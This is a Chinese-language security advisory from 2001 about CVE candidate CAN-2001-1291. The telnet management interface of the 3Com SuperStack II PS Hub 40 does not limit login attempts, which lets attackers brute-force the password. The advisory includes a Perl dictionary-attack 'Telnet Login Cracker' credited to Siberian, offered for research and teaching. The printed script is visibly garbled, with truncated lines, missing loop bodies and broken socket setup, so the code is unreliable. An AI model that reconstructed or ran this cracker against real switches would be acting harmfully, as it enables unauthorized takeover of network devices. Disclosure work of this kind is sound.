首页 -> 安全研究

安全研究

安全漏洞
3Com Telnetd 弱口令保护问题

发布日期:2001-07-12
更新日期:2001-07-19

受影响系统:

3Com SuperStack II PS Hub 40
描述:

BUGTRAQ  ID:3034
CVE(CAN) ID: CAN-2001-1291

某些3com交换机中存在一个潜在的安全问题。

如果远程攻击者试图登录基于telnet的管理接口,交换机没有限制允许登录的次数。因此
攻击者可以采用暴力猜测口令的方法快速获取对3com telnetd配置接口的访问权限。

攻击者可以控制交换机来进行进一步的攻击。

<*来源:Siberian (siberian@sentry-labs.com) *>




测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


Siberian (siberian@sentry-labs.com)提供了下列测试代码:

#!/usr/bin/perl -w

#######################esponsible for any damgae caused  #
# by the###########################################
rf, chr(13), chr(10);

recv(SOCK,$ol,1,0);
$passwd,0);
   }
   recv(SOCK,$ol,1,0);
$i++
}
$i=1;
}
print "\n\nIt's sad but true, you failed.\n";
}


print "\n3Com Hardware Telnet Login Cracker, written by Siberian \- Sentry Research Labs\n\n";
print "Get the latest Version at www.sentry-labs.com\n\n [target host] [dictionary] (username)";
$us= inet_aton($remote) or die "No target host computer found!";
$paddr = sockaddr_in(23, $iesspass();

close(FILE1);
close(SOCK);
exit 0;




建议:

厂商补丁:

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.3com.com



浏览次数:3658
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障